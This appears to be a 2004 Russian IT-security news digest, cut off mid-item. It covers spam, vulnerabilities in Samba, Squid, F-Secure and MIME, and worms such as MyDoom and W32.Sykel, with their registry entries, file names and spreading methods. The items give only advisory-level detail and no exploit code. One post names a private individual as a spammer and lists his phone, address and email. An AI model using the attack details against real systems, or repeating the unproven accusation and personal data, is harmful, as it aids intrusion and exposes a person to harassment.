15/09/2004 11:30 Провайдеры защитили американцев от спама, но оказались бессильны перед вирусами
Большинство американских интернет-пользователей довольны уровнем защиты от спама, который им обеспечивают интернет-провайдеры. В то же время серьезные нарекания у пользователей вызывает низкий уровень защиты от хакерских атак и вредоносных программ. Таковы результаты опроса, проведенного исследовательской компанией J.D. Power and Associates, сообщает TechWeb News. 9500 респондентов отметили, что уровень защиты от спама в 2004 году значительно улучшился по сравнению с 2003 годом. В то же время уровень защиты от хакеров и вирусов оказался единственным ухудшившимся показателем из семи, которые рассматривали J.D. Power and Associates. "Качество спам-фильтров значительно улучшилось. Но пользователи требуют, чтобы провайдеры шли дальше и устанавливали межсетевые экраны", - прокомментировал результаты опроса аналитик J.D. Power and Associates. Самые высокие оценки пользователей как модемных, так и выделенных линий, получил провайдер EarthLink. Второе и третье места в списке модемных провайдеров получили Juno/NetZero и AT&T WorldNet. Среди тех, кто занимается проведением выделенных линий, второе и третье места заняли Verizon и Road Runner. В ходе исследования также выяснилось, что число пользователей домашнего интернета в США возросло на 2% и достигло 66%. С 2002 по 2003 год такой рост составил 7%. 39% пользователей сегодня имеют выделенную линию. В 2003 году таких пользователей было 26%. Если существующие тенденции роста сохранятся, число пользователей выделенных линий в США сравняется с числом пользователей модемов в 2007 или даже 2006 году.
Viruslist

15/09/2004 11:19 В Бразилии обнаружили много диких хакеров
Бразилия превратилась в глобальный центр киберпреступности и интернет-мошенничества, считают эксперты, собравшиеся на конференцию в столице этой южноамериканской страны. Как сообщает BBC News, согласно данным, обнародованным федеральной полицией, восемь из десяти хакеров в мире живут в Бразилии. В этой стране количество денег, потерянных в результате мошенничества в интернете, превышает убытки от ограблений банков. Также Бразилия является страной происхождения для двух третей мировых порносайтов. Эту статистику подтверждают эксперты по компьютерной безопасности из других стран. Они утверждают, что в прошлом году с территории Бразилии было предпринято около 96 тысяч хакерских атак, что в шесть раз больше аналогичных показателей для любой другой страны. Многие бразильские хакеры объединяются в группировки с названиями вроде "Сломаем вашу защиту" или "Виртуальный ад". Такая высокая активность объясняется, в частности, пробелами в национальном законодательстве, согласно которому хакерство не считается преступлением. Поэтому полиции приходится доказывать, что имел место факт мошенничества, чтобы наказать виновных.
Lenta.ru

15/09/2004 10:39 Microsoft выпустила патч для "критического" дефекта в системе безопасности Windows
Корпорация Microsoft выпустила во вторник вместе с ежемесячным бюллетенем обновление, позволяющее устранить дефект в системе защиты Windows, классифицирующийся как "критический", то есть представляющий наибольшую опасность для пользователей. Как сообщает Reuters, новый патч вылечивает уязвимость операционной системы Windows XP, программ Office 2003, Project, Visio, Visual Studio и других приложений, имеющих дело с изображениями в формате JPEG. Недоработка в системе позволяла хакерам проникнуть в компьютер пользователя, если тот откроет определенный файл или изображение на специально созданном сайте. "Заплатку", закрывающую эту "дыру" можно скачать со страницы компании Microsoft. Также компания выпустила патч для "важной" ошибки в программном обеспечении, отвечающем за преобразование файлов WordPerfect в Microsoft Office. Первый имеет обозначение MS04-028 (уязвимость в обработке JPEG), второй - MS04-027 (уязвимость в преобразовании файлов из WordPerfect).
Yahoo! News
MS04-027
MS04-028

15/09/2004 10:07 Обойдемся без хакеров
В горькие сентябрьские дни, когда вся страна не отрывалась от телевизоров, приемников и новостных сайтов, люди не раз в сердцах задавали вопрос: где же хваленые "русские хакеры"? Почему они не уничтожат сайты террористов? Попробуем ответить на этот вопрос. Во-первых, компьютерный взлом - это инструмент преступника, а не защитника. Цивилизованный мир не должен использовать незаконные средства, чтобы не встать на одну ступеньку с варварами - это известный принцип, особенно часто звучащий в наши дни. Даже в борьбе с абсолютным злом, с терроризмом, мы должны быть разборчивы в средствах. Во-вторых, уничтожить сайт технически практически невозможно. Слово создателю сайта об информационной безопасности bugtraq.ru, соавтору книги "Атака на Интернет" Дмитрию Леонову: "Во-первых, во взломе нет никакого смысла - любой взломанный сайт восстанавливается в худшем случае в течение нескольких часов или в течение нескольких дней меняет хостинг. Во-вторых, целенаправленные взломы конкретных сайтов на самом деле встречаются очень редко, а то, что завалить можно что угодно, было бы желание, всего лишь заблуждение. Как правило, обычно просто идет последовательное сканирование сети на предмет обнаружения серверов с известными уязвимостями. Чудес не бывает - сайт, расположенный на нормальном хостинге, администрация которого заботится о безопасности, можно разве что временно вывести из строя распределенной атакой, но для этого надо потратить немало времени на подготовку, да и эффект будет кратковременным". В общем, можно взломать или заблокировать сайт - но это временно, пока владелец не предпримет защитных мер. Даже если стереть с сервера всю информацию, она может быть восстановлена с резервных копий. Именно поэтому наиболее продуктивное "оружие" против незаконных, с нашей точки зрения, сайтов - официальное. Интернет-провайдеры обычно включают в перечень условий предоставления услуг пункт о запрете публикации экстремистских материалов, но фактически не занимаются специальной проверкой содержания страниц своих клиентов. Тем более если провайдер зарубежный, а страницы - на чужом языке. Поэтому зачастую указания на характер сайта бывает достаточно, чтобы провайдер его выключил. Так, например, в 2001 году власти Нидерландов закрыли голландскую версию промасхадовского сайта "Кавказ-Центр", обнаружив там призывы к мусульманской молодежи проходить подготовку для участия в "борьбе с неверными" в Чечне, а также рекомендации по развертыванию учебно-тренировочных военных лагерей и другие подобные материалы. А в 2002 году на следующий день после захвата заложников на Дубровке прекратил работу основной сайт "Кавказ-Центр" - тогда издание Cnews.ru рассказало, что сайт был выведен из строя при помощи группы русских и американских программистов, живущих в Калифорнии. "Респектабельная американская компания, поддерживавшая нейм-сервера террористов, была в полном неведении, они были в шоке, когда узнали, что оказались невольными пособниками террора. Сайт "загасили" в течение 10 минут. Трудно поверить, что все так просто и хакеры не понадобились, но это так", - рассказал участник событий изданию. Однако не всегда простого объяснения провайдеру ситуации бывает достаточно. Например, промасхадовский сайт "Кавказ-Центр" с прошлого года работает в Литве на площадке вильнюсского провайдера Elneta Ltd, несмотря на официальное представление российского МИДа к посольству Литовской Республики в Российской Федерации в феврале 2003 года. Сообщалось, что хотя литовские спецслужбы пытались закрыть сайт, им помешали депутаты сейма. Наконец, если уж вернуться к хакерам, то надо признать, что взломы промасхадовских сайтов были, и не раз. Например, в 1999 году хакеры вывесили на заглавной странице "Кавказ-Центра" портрет Лермонтова в папахе, бурке и с автоматом наперевес. А весной 2002 года он был взломан некой "Сибирской сетевой бригадой", участники которой написали на заглавной странице промасхадовского сайта "Мы вырвали жало из вонючей пасти "Гавгав-центра"". Не приходится сомневаться, что были и другие случаи сетевых атак, о которых не так хорошо известно: результаты хакерской атаки чаще всего внешне не отличаются от технического сбоя. Возможно, и в этом черном сентябре атаки были. Однако напомним, - хакерские взломы не являются ни достойным, ни эффективным способом ликвидации даже самых незаконных сайтов.
Crime-research.ru

14/09/2004 16:57 О спаммерах и провайдерах их провайдерящих
К сожалению, проблема спама в крайнее время становится очень актуальной (особенно для фирм, компаний, оплачивающих трафик). И к тому же сожалению желающих заработать на этом бизнесе тоже становится всё больше. Пальму первенства знаменитого "Центра американского английского" начинают перехватывать господа из www.goldfirms.ru. Смею предположить, что самый последний массовый спам исходит от них. Сам домен зарегистрирован на г... (до господина это ... не доросло) Константина Бычкова, который зафиксирован по следующим контактным телефоно-адресам: +7 095 1095325 (при этом значится юр. адрес в г. Чебоксары - Московский проспект, 42). Почтовый адрес г... Бычкова - postmaster@samvel-english.ru. Хостится этот домен у провайдера Информтелеком XXI Ltd., который прописан по адресу: Москва, Рощинский проезд, 7/8. К сожалению, обращения к администраторам провайдера должных мер не возымели. Поэтому большая просьба к провайдерам "Информтелекома" обратиться к нам (если мы сами их не найдём). Также очень огорчает, что всевозможные меры, которые предпринимаются не касаются наших доблестных регистраторов, у которых чёрным по белому написано, что спам от зарегистрированного домена не является основанием для его закрытия.
Мы

14/09/2004 13:56 Блокирование работы встроенной камеры при помощи Bluetooth
На выходных днях сингапурское издание AsiaOna сообщило очень интересную новость: студенты одной из политехнических школ разработали программное обеспечение, благодаря которому, используя Bluetooth-соединение, можно блокировать работу встроенной цифровой камеры на некоторых камерафонах от компании Nokia. На данный момент известно, что эксперимент удался со смартфоном Nokia 6600 и телефоном Nokia 7610. Идея может найти применение в местах повышенной безопасности, где съемка просто запрещена, например, в больницах, военных учреждениях и некоторых школах. Конечно же, если подобную систему введут в эксплуатацию, владельцы камерафонов должны оповещаться о входе в зону действия системы.
Mobile-review

14/09/2004 13:16 Уязвимости в Samba
Сообщается об обнаружении двух уязвимостей в Samba (ПО для разрешения ресурсов UNIX-серверов через NetBIOS-сеть), которые могут быть использованы для проведения DoS (Denial of Service) атаки на уязвимую систему. Первая уязвимость связана с ошибкой в smbd в модуле разбора ASN.1. Она может быть задействована с помощью специально созданного пакета в момент аутентификации и привести к созданию множества новых процессов в бесконечном цикле. Это приведет к тому, что исчерпаются все доступные ресурсы памяти. Вторая уязвимость связана с ошибкой проверки вводимой последовательности в nmbd в функции "process_logon_packet()" когда обрабатывается пакет из мейл-слота. Уязвимость может быть задействована так, что это приведет к краху демона в процессе обработки специально созданного "SAM_UAS_CHANGE" запроса. Успешное использование уязвимостей требует чтобы демон был сконфигурирован для регистрации в домене ("domain logons = yes" in smb.conf). Уязвимость присутствует в версии 3.0.6 и более ранних. В качестве решения проблемы предлагается обновить версию до 3.0.7, где уязвимость исправлена. Обе уязвимости обнаружены всё той же iDEFENSE.
Подробности

14/09/2004 13:01 Symantec запускает антифишинговый сервис
Подписчики новой услуги Online Fraud Management будут регулярно получать обновления фильтров, блокирующих свежие фишинг-рассылки, заманивающие пользователей на сайты, имитирующие страницы управления счетов популярных банков и прочие коммерческих служб, cообщает bugtraq.ru. Для обеспечения работы этой службы будет использована глобальная сеть, включающая множество почтовых аккаунтов, предназначенных для отлавливания подобных рассылок - этакий вариант стаи подсадных уток.
Подробности

14/09/2004 11:58 Уязвимость в F-Secure Internet Gatekeeper
iDEFENSE сообщает об обнаружении уязвимости в ПО фильтрации содержимого Интернет-трафика и одновременно антивирусе F-Secure Internet Gatekeeper (проверяет SMTP и HTTP-траффик). Из-за ошибки при обработке пакета, приходящего на порт 18,971 (на нём висит сканер содержимого) может возникнуть ситуация, приводящая к отказу в обслуживании (DoS) службы с аварийным заавершением процесса с выдачей ошибки доступа (access violation error). Как пишут авторы обнаруженной уязвимости, приотказе службы в зависимости от конфигурационных параметров может появиться диалоговое окно, предупреждающее о завершении процесса FSAVSD.EXE, после чего (через 30-40 сек.) сервер автоматически перегрузится. Посылая периодически специальные пакеты, можно вызывать циклическую перезагрузку сервера. Уязвимости подтверждены в версиях F-Secure Internet Gatekeeper Server 6.31 и раньше. В качестве временной меры защиты предлагается настроить F-Secure Content Scanner Server принимать соединения только от доверенных IP-адресов. Производителем (F-Secure) выпустил временный патч.
Подробное описание

14/09/2004 11:34 Open Source Solaris дебютирует в этом году
Как заявили в понедельник руководители Sun Microsystems, к концу этого года компания организует проект open-source вокруг своей операционной системы Solaris 10. В рамках этой инициативы инженеры Sun, партнеры и другие программисты смогут вносить собственный вклад в разработку операционной системы Unix. Sun уже сейчас проводит тестирование программы с заказчиками и к концу года завершит его, сказал вице-президент Sun по маркетингу ПО Марк Макклейн. Sun поделилась своими планами в отношении open-source с представителями прессы и аналитиками на брифинге по Solaris 10 в офисе компании в Бурлингтоне (штат Массачусетс). Новая операционная система будет более быстродействующей и более устойчивой к ошибкам аппаратуры и ПО. Целью Solaris 10 с открытым исходным кодом, капитального обновления Solaris, является привлечение интереса к операционной системе. В частности, проект нацелен на разработчиков и ученых, которые сами смогут вносить изменения в код. Проект open-source поможет Sun укрепить связи с сообществом разработчиков, в том числе с независимыми и университетскими программистами, сказал Макклейн. «Мы утратили образ лидера инноваций, активно работающего с сообществом программистов», — признал он. Сейчас Sun находится в стадии подготовки проекта, который некоторые инженеры Solaris называют Open Source Solaris. Работа, проделанная инженерами Sun, составит ядро операционной системы. Для последующих версий Sun будет отбирать предложения, присланные другими участниками проекта, следя за тем, чтобы Solaris не распалась на разные несовместимые версии. За образец для своего проекта open-source Sun возьмет ту модель, которую Apple использует для Darwin, а Red Hat — для Fedora, сказал вице-президент Sun по операционным платформам Глен Вайнберг.
Подробности

14/09/2004 11:13 Sender ID, возможно, не будет официальным стандартом интернета
Технология SenderID, предлагаемая компанией Microsoft в качестве стандарта на технологию подтверждения подлинности отправителей электронной корреспонденции, может быть отклонена организацией Internet Engineering Task Force (IETF). В ходе предварительного обсуждения заявки Microsoft эксперты, входящие в рабочую группу MTA Authorization Records in DNS (MARID), решили, что использование в качестве стандартов технологий, которые могут оказаться запатентованными, не приемлемо. Ранее от использования в своих продуктах Sender ID отказались сообщества разработчиков Apache и Debian. Основанием для этого послужили предложенные Microsoft условия лицензирования Sender ID. Часть этих условий противоречат положениям лицензий, используемых сообществом open-source. Как поясняет Internet News, Microsoft подала заявку на патент, описывающий совместное использование двух технологий подтверждения подлинности отправителя - Sender ID и Purported Responsible Address (PRA). И если Sender ID является развитием технологий Microsoft Caller ID for e-mail и SPF, предложенной Мэном Воном, основателем компании Pobox.com, то вторая является уже собственной разработкой Microsoft.
Подробности

14/09/2004 10:20 Недельный отчет о вирусах и вторжениях Panda Software
Опубликован традиционный еженедельныйй отчёт Panda Software. Посвящен семи червям: четырем версиям Mydoom (T, U, V и W), Mywife.D, Mywife.C и Sdbot.AQA, и двум программам adware: Neededware и Wupd.
Отчёт

14/09/2004 09:51 Индийский софт завоевывает рынок
Индия намерена в следующем бюджетном году на тридцать процентов увеличить экспорт своего программного обеспечения, передает Reuters. В 2003-2004 годах объем экспорта в сфере ПО и предоставления услуг аутсорсинга превысил 12 миллиардов долларов и, судя по всему, Индия не намерена останавливаться на достигнутом. Почти 25 процентов от общего объема экспорта приходится на три ведущие индийские компании: Tata Consultancy Services Ltd, Infosys Technologies Ltd и Wipro Ltd. Количество служащих в них превышает 800 тысяч человек. "Мы спроектировали на следующий бюджетный год увеличение экспорта на 30-32 процента. Такая цифра нас устраивает", - заявил президент Национальной ассоциации производителей ПО и компаний обслуживания (NASSCOM) Киран Карник (Kiran Karnik). Индия, подчеркивает Reuters, не собирается отказываться от своих планов несмотря на все усилия ведущего производителя ПО - США, пытающихся препятствовать аутосорсингу и защитить рабочие места. Аутосорсинг был одним из ключевых вопросов в предвыборной кампании обоих кандидатов на президентство. Власти США провели около 120 проверок деятельности иностранных фирм, занимающихся этим бизнесом, которые, по словам Карника, не выявили причин для беспокойства.
Lenta.Ru

14/09/2004 09:45 Уязвимость в Squid 2.x
M.A.Young сообщает об обнаруженной уязвимости в Squid, которая может быть использована для проведения DoS (Denial of Service) атаки на уязвимую систему из локальной сети. Уязвимость связана с ошибкой в функции "clientAbortBody()" при разыменовывании указателя и непроверке его на NULL. Теоретически уязвимость может быть задействована при посещении специально созданного веб-сайта через прокси и приводить к краху Squid-а. Выпущены патчи для версий 2.5.STABLE5 и 2.5.STABLE6. Однако, как заметили автору, опубликовавшему уязвимость, отказ функционирования SQUID происходит не в следствие переполнения буфера, а из-за попытки обращения за пределы размещённого блока памяти.
Подробное описание

13/09/2004 17:40 Множественные уязвимости в реализации протокола MIME
Исследовательская компания Corsaire (основана в 1997 г. в Guildford, Surrey, UK), специализирующаяся на исследовании безопасности различных фирм, в процессе проверки одной из страховых комапаний обнаружила множество уязвимостей в популярном протоколе MIME ( Multipurpose Internet Mail Extensions). Этот протокол используется практически всеми Email-клиентами, Вэб-браузерами, антивирусными продуктами, системами контроля содержимого почты и Вэб-контента. Как пишут сами авторы, обнаруженные 14 базовых уязвимостей позволяют провести атаку по 190 векторам атаки! После окончательного исследования данные об уязвимостях были переданы Центру координации национальной инфраструктуры Великобритании (UK National Infrastructure Co-ordination Centre - NISCC). После изучения Центром представленных данных предполагалось опубликовать информацию об обнаруженных уязвимостях. Ввиду крайней опасности обнаруженных уязвимостей в течение длительного времени также велась работа с разработчиками и производителями ПО. Судя по всему, среди пострадавших оказалось огромное чило программных продуктов (речь идёт о сотнях). Некоторые уязвимости обнаружены почти год назад. Как и было обещано, сегодня Corsaire опубликовала подробные отчёты о 8 обнаруженных уязвимостях. Описывать их все не позволяет объём публикуемых новостей, поэтому предлагаем нашим посетителям самостоятельно ознакомиться с ними, для чего следует смотреть отчёты об уязвимостях, датируемых 13 сентября.
Описания уязвимостей

13/09/2004 16:51 Описание XSS-атак и методов защиты от них
На сайте SECURITY PIPELINE опубликована статья Marco Morana (независимый консультант по безопасности) под названием "Make it & Break It: Defending Against Cross-Site Scripting Attacks". Как следует из названия, автор описывает тип атак на Вэб-сервера (и на посетителей Вэб-серверов) под названием XSS, что означает "cross-site scripting" (назван XSS, чтобы не путать с другим понятием в HTML, носящим название CSS - cascading style sheets). Подробно рассматрены основные принципы формирования этих атак, а также методы защиты от них.
Cтатья

13/09/2004 16:26 Longhorn сможет блокировать подключение мобильных устройств
В следующей версии Windows (кодовое имя Longhorn) компания Microsoft предоставит корпоративным пользователям возможность блокировать использование различных портативных устройств. Эта функция войдет в качестве составной части в технологию Plug and Play Extensions. Новая технология предоставит корпорациям и предприятим некоторый контроль над мобильными устройствами, которые ранее легко подключались к компьютерам через USB, Bluetooth или другие порты. Сделано это было по многочисленным просьбам компаний, ИТ-менеджеры которых всерьез опасаются угрозы для безопасности корпораций со стороны различных запоминающих устройств, таких как флэш-диски, телефоны, MP3-плееры и т.д., вмещающие большие объемы данных. Такие устройства могут использоваться для копирования секретных данных из офисных компьютеров или для занесения в компьютерные сети вирусов, троянцев и другого вредного ПО. Microsoft также заявила, что домашние пользователи с помощью Plug and Play Extensions смогут подключать к ПК принтеры, MP3-плееры, мобильные телефоны и КПК так же легко, как сегодня USB-драйвы.
SecurityLab.ru

13/09/2004 15:32 СБУ разоблачила канал несанкционированного доступа к базе данных ГАИ УМВД
Сотрудники управления контрразведывательного обеспечения информационной безопасности государства Департамента контрразведки и их коллеги одного из региональных органов Службы безопасности Украины разоблачили канал несанкционированного доступа посторонних лиц к базе ГАИ. Об этом ForUm’у сообщили в пресс-службе Службы безопасности Украины. Выполняя работы по созданию корпоративной компьютерной сети в одной из областных Госавтоинспекций, представители некоего ООО, с которыми было заключено двустороннее соглашение, злоупотребляя доверием заказчика, под благовидным предлогом завладели информационными данными региональной интегрированной информационной системы ГАИ относительно транспортных средств (марка, номера кузова и мотора), а также сведений об их владельцах. Они несанкционированно подключились к серверу автоматизированной системы областного управления ГАИ и вся имеющаяся в компьютерной сети информация сканировалась непосредственно на квартире руководителя фирмы. Копирование осуществлялось с начала января до конца августа 2004 года. Сотрудники отмеченного "ООО" подобный монтаж базы данных выполняли еще в десяти других областных управлениях Госавтоинспекции. В настоящее время сотрудниками СБУ детально изучаются все обстоятельства, приведшие к утечке конфиденциальной информации. По этому факту следственным отделом регионального органа СБ Украины возбуждено уголовное дело. Ведется следствие.
crime-research.ru

13/09/2004 15:08 «Говорящий» вирус общается со своей жертвой
Почтовый вирус Amus использует встроенный в WinXP голосовой движок для того, чтобы произвести впечатление на хозяина зараженного компьютера, сообщает Internet.ru. Согласно Sophos, почтовый вирус (точнее, червь) W32/Amus-A относится к весьма немногочисленному отряду разговорчивых вредоносных программ. Попадая на компьютер жертвы, вирус запускает приложение Windows Speech Engine, входящее в комплект поставки Windows XP, и разражается длиннейшей нотацией. «Привет», – говорит вирус. – «Я вернулся. Меня зовут мистер Хэмси и я вижу тебя. Ха-ха-ха. Приезжай к нам в Турцию, а пока я почищу твой компьютер. Пять, четыре, три, два, один, ноль. Пока-пока.» Пока жертва рассеянно слушает послание из далекой Турции, вирус потихоньку гадит на ее компьютере. Если дело происходит 10-го или 23-го числа каждого месяца, вирус удаляет все обнаруженные им в каталоге Windows файлы с расширением .ini. 2-го, 15-го и 17-го числа вирус борется с .dll-файлами. Кроме того, программа меняет домашнюю страничку в браузерах семейства Internet Explorer на небольшое сообщение с жалобой на ужасные страдания турецких пользователей, стенающих под железной пятой местных телекомов. В системном реестре следы вируса выглядят так: HKCU\Software\Microsoft\Masum\ Who = "OnEmLi_DeGiL"
HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\ Start Page = "Konneting du pepil and dizkoneting you. Anlami: Baglansan ne olacak, baglanmasan ne olacak. Zaten hatlar burada rezalet."
Вирус встречается редко и обычно попадает на пользовательский компьютер в виде письма, озаглавленного «Listen and Smile» или «Hey. I beg your pardon. You must listen».
Описание

13/09/2004 14:35 Защита wi-fi трафика в домашней сети с использованием IPSec
На opennet.ru опубликована статья (автор - Антон Карпов) с описанием настройки IPSec соединения на сервере и на клиентской стороне, для обеспечения безопасности в беспроводной сети. Примеры настроек приводятся как для FreeBSD 4, так и для FreeBSD 5.
Cтатья

13/09/2004 14:02 LogicaCMG: 50% компаний не имеют стратегии обеспечения информационной безопасности
Согласно результатам исследования, проведенного специалистами LogicaCMG, в ходе которого были опрошены представители 350 компаний, половина фирм не имеют четко сформулированной стратегии обеспечения информационной безопасности. 71% компаний, участвовавших в опросе, полагаются на свои IT-департаменты в вопросах разработки и воплощения в жизнь политики информационной безопасности фирмы. Опрошенные в ходе исследования 100 специалистов по инвестициям поставили проблему несоблюдения безопасности на третье место в ряду факторов, которые негативно влияют на оценку компаний. Данная проблема по значимости для инвесторов стоит после ложной финансовой отчетности и внезапного ухода высшего руководства, сообщил Vnunet.
CNews

13/09/2004 13:00 Gartner: Надеяться на Longhorn не имеет смысла
Аналитическая компания Gartner распространила среди своих клиентов рекомендации, касающиеся новой операционной системы Longhorn, сообщает "Компьюлента". Суть рекомендаций, о которых рассказывает издание Infoworld, сводится к тому, что не стоит строить далеко идущие планы, связанные с Longhorn. Исключение из этой ОС новой файловой системы WinFS и другие изменения позволяют предположить, что Longhorn не будет той самой революционной ОС, о которой так долго говорили в Microsoft. По мнению аналитиков Gartner, в компании решили, во что бы то ни стало, выпустить Longhorn к концу 2006 года, чтобы заткнуть дыры в графике выпуска новых операционных систем. А тот факт, что Microsoft выпустит обновления для Windows XP, обеспечивающие поддержку новых программных интерфейсов WinFX и технологий Indigo и Avalon, означает, что ориентированные на Longhorn приложения можно будет использовать и в среде Windows XP. На этом основании в Gartner предсказывают, что Windows XP будет широко использоваться вплоть до 2011 года и станет, таким образом, самой долгоживущей версией Windows. Напомним, что дебют Windows XP состоялся осенью 2001 года. Долгий век ожидает и ОС Windows Server 2003: по прогнозу Gartner, она будет широко использоваться до 2010 года. В краткосрочной перспективе Gartner рекомендует своим клиентам сделать корпоративным стандартом ОС Windows XP со вторым сервис-паком. Это позволит обеспечить готовность к дальнейшей модернизации системы. Если после выхода Longhorn выяснится, что миграция на эту ОС все же оправдана - ее нужно будет провести. В противном случае можно будет установить обновления для Windows XP с поддержкой Indigo и Avalon и работать дальше, дожидаясь следующей после Longhorn версии Windows. Связывать же с Longhorn какие-то серьезные планы в Gartner категорически не рекомендуют. Еще один интересный момент в рекомендациях Gartnet связан с пресловутой файловой системой WinFS, в которой должны были быть использованы технологии, позаимствованные у реляционных СУБД. Опираясь на тот факт, что Microsoft собирается выпустить систему локального поиска, обходящуюся без WinFS, в Gartner предполагают, что новая файловая система вообще никогда не будет выпущена. Главной ее задачей было усовершенствовать организацию хранения информации. Если эту задачу удалось решить другим способом, использование WinFS теряет смысл.
Подробности

13/09/2004 11:17 RiNet ISP отвечает на тариф "Стрим-Нео"
Как известно, "МТУ-Интел" 1 сентября ввела тарифный план "Стрим-Нео", который был призван перетянуть частных клиентов у домашних сетей. Домашние сети ответили на вызов "МТУ-Интел", предложив аналогичные тарифные планы. В частности, абонентская плата в "Стрим-Нео" составляет 24 долл., но при ограничении на скорость соединения в 160 Кбит/с. 8 сентября сеть Degunino.Net предложила своим клиентам тариф U-160light, в рамках которого скорость соединения составляет 160 Кбит/с (только в обе стороны, в отличие от "Стрим-Нео") уже за 19 долл. Также на тариф "МТУ-Интел" в свою очередь ответил провайдер RiNet ISP, который сообщил об открытии новых тарифов без ограничения трафика для абонентов волоконно-оптичекой сети RiNet в ЦАО с сентября 2004 года. При абонентской плате $20/мес. пользователи получают выделенный канал со скоростью 192 Кбит/с к абоненту. При абонентской плате $30/мес. скорость передачи данных к абоненту возрастает до 512 Кбит/с. При абонентской плате $60/мес. скорость передачи данных составляет 1024 Кбит/с. Обратный канал (скорость передачи данных от абонента) на всех тарифах ограничен 128 Кбит/с. Данный сервис предусматривает предоставление клиенту одного IP-адреса из приватных сетей (перечисленных в RFC 1918). Запрещается подключение по данным тарифам более чем одного компьютера, в том числе и с использованием прокси и NAT серверов. Предполагается индивидуальное использование компьютера подключенного по данным тарифам и не разрешается перепродажа или бесплатное предоставление услуги третьим лицам. Количество одновременно устанавливаемых TCP-сессий — не более восьми. Стоимость подключения — $50. В первую очередь выполняются заявки на подключение в районах «Якиманка», «Замоскворечье», «Даниловский».
Подробности

13/09/2004 10:48 Обмен файлами по телефонной сети
В компании SK Telecom, являющейся одним из крупнейших операторов мобильной связи Южной Кореи, разрабатывается приложение, которое даст абонентам сотовых сетей третьего поколения возможность обмениваться по ним файлами - мелодиями звонков, фотографиями, музыкой и видео. Предварительная версия файлообменной службы была продемонстрирована недавно на выставке ITU Telecom Asia 2004. Система объединяет пользователей в одноранговую сеть, позволяющую им свободно передавать друг другу любые файлы. В текущей версии службы отсутствуют какие-либо функции предотвращения обмена материалами, защищенными авторским правом, и, по словам разработчиков, данной проблемы они касаться не собираются. Дополнительно та же группа программистов разрабатывает для пользователей SK Telecom службу Web-дневников.
"Открытые системы"

13/09/2004 10:14 MyDoom выпустил четыре щупальца
В пятницу секьюрити-эксперты предупредили, что в интернете появилось несколько новых версий MyDoom, и высказали предположение, что авторы червя решили усовершенствовать его. Все новые вирусы очень похожи: они распространяются, добавляя копии программы к сообщениям e-mail, и загружают дополнительные функции со взломанных веб-сайтов. Более того, все они отличаются тем, что их очень трудно удалить из зараженных Windows-ПК, так как они мешают системе подключиться к антивирусным сайтам для загрузки обновлений. Тот факт, что за короткое время выпущены сразу несколько похожих вариантов вируса MyDoom, указывает на возможность скорого появления более опасного вируса, считает Сэм Керри, вице-президент по управлению продуктами eTrust компании Computer Associates International. «Аналогичное поведение мы наблюдали у вируса Bagle — сначала вышли три или более сравнительно безобидных варианта, а за ними последовал очень опасный вирус. Мы чрезвычайно встревожены ситуацией и рекомендуем людям предельно осторожно обращаться со своей электронной почтой». Новые варианты вируса возобновили атаки на Microsoft и к тому же содержат объявления о поиске работы в секьюрити-индустрии. Появление отпрысков MyDoom с кодом, препятствующим их удалению, может указывать на то, что спамеры или другие темные силы в интернете хотят получить контроль над большим числом ПК, отмечает старший директор по реагированию на секьюрити-инциденты компании Symantec Альфред Хьюгер. «Я думаю, что мы имеем дело с каким-то захватчиком. Похоже, что вирус нацелен на захват новых хостов и удерживание их». Еще одна правдоподобная теория заключается в том, что автор или авторы злокачественной программы совершенствуют свой арсенал и проводят испытания, говорит Хьюгер. «Очень вероятно, что ведется итеративная разработка или что исходный код попал в руки другой группы». Это может означать, что на подходе более грозный вариант Doom.
ZDNet

12/09/2004 17:47 Программа для защиты корпоративной информации
Японский разработчик ПО Quality Corp. выпускает завтра программу eX WP, предназначенную для защиты от записи данных с компьютера на USB-устройства. Целью программы является защита корпоративных данных от нелегального копирования недобросовестными сотрудниками, например, с использованием USB-стиков, цифровых фотокамер или других подобных устройств, имеющих функцию записи через USB-порт ПК. Выпускаемая программа разрешает свободное чтение данных с USB-устройств, но запрашивает пароль при попытке записи. Лицензия eX WP на 10-пользователей стоит около 380 евро.
Relib.com

12/09/2004 14:56 Движок Gecko портирован под Qt/KDE
Во время саммита KDE-разработчиков aKademy'2004 группа хакеров за четыре дня перенесла Gecko на Qt, сообщает linux.org.ru. Теперь Qt можно использовать в качестве бэкенда Mozilla наравне с Win32, Gtk или Aqua. Коду уже отведено место на CVS-сервере Mozilla Foundation, и он будет поддерживаться разработчиками как KDE, так и Mozilla. Однако на этом планы не останавливаются: в данный момент идет работа над реализацией Gecko в виде KPart, и последующей интеграцией с Konqueror - сюда, в частности, входит поддержка KWallet и KCookieJar. Эта часть проекта, разумеется, является специфичной для KDE, и живет на их серверах. Таким образом, в ближайшем будущем в Konqueror появится возможность сменить движок KHTML, используемый по умолчанию, на предпочитаемый многими Gecko.
Подробности

12/09/2004 13:10 Выход X11R6.8
Сообщество X.Org объявило о выходе новой версии X11 - графического сервера для Unix, входящего во многие дистрибутивы Unix и Linux. В X11R6.8, пришедшем на смену X11R6.7, наблюдается значительное количество нововведений, причем они не ограничиваются тривиальным списком моделей оборудования, поддержка которого была включена в релиз (хотя подобный список и присутствует), и перечислением небольших доработок. В новую версию были добавлены некоторые эксперементальные функции, которые смогут в будущем пригодиться программистам, работающим с графическим сервером напрямую (в первую очередь, авторам оконных менеджеров и программ для удаленного доступа к графической среде).
Пресс-релиз

12/09/2004 12:37 Троян W32.Sykel
О появлении нового трояна W32.Sykel сообщает Symantec. Заражает удалённые компьютеры через дыру в LSASS (бюллетень MS04-011) и пытается распространить себе через сеть KaZaA. Из-за типа используемой уязвимости поражает только компьютеры под управлением Windows XP/2K/NT. Тело трояна имеет размер 17,920 байт. После заражения создаёт ключ реестра: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\iestart] = %System%\iexp1orer.exe. Копирует себя в директории разделяемых (общих) папок для Kazaa и ICQ под именами: fantasy.scr, you the best.scr, pinguin5.exe, hello.pif, myfack.pif, icqcrack.exe, antibush.scr, mylove.pif, newvirus.exe, matrix.scr, rulezzz.scr, mymusic.pif, 1.exe, winamp5.exe и т.д. (см. полный отчёт). После этого пытается соединиться со случайным IP-адресом (порт 445), в случае успеха посылает шелл-код, который открывает удалённый доступ на случайном TCP-порту. Cоединяется опять с FTP-сервером с порта, используемого предыдущей открытой оболочкой и скачивает тело трояна. Посылает сообщения пользователям ICQ из контактного листа с предложением посетить определённые URL, на которых уже присутствуют трояны W32.Mydoom.V@mm или Backdoor.Nemog.C. Опубликованы процедуры по защите (как ни странно, но ещё есть довольно много компьютеров, 